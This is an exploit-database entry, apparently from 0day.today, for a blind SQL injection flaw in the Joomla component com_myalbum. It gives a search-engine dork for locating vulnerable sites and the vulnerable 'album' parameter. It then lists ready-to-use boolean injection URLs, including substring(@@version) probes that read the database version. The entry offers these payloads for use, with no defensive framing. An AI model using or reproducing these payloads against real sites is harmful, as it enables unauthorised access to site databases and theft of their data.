id: 20761
date: 05/12/2013
title: Joomla Component com_myalbum Blind Injection Vulnerability
author: AtT4CKxT3rR0r1ST
cves: 

Joomla Component com_myalbum Blind Injection Vulnerability
==============================================================
 
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Dork           : inurl:"com_myalbum"
.:. Script         : http://joomlacode.org/gf/project/myalbum/
####################################################################
===[ Exploit ]===

Blind Injection:
================

www.site.com/index.php?option=com_myalbum&album=1[injection]

www.site.com/index.php?option=com_myalbum&album=1+and+1=1       >>> True
www.site.com/index.php?option=com_myalbum&album=1+and+1=2       >>> False
 
 
www.site.com/index.php?option=com_myalbum&album=1+and+substring(@@version,1,1)=5  >>> True
www.site.com/index.php?option=com_myalbum&album=1+and+substring(@@version,1,1)=4  >>> False

####################################################################

#  0day.today [2023-03-22]  #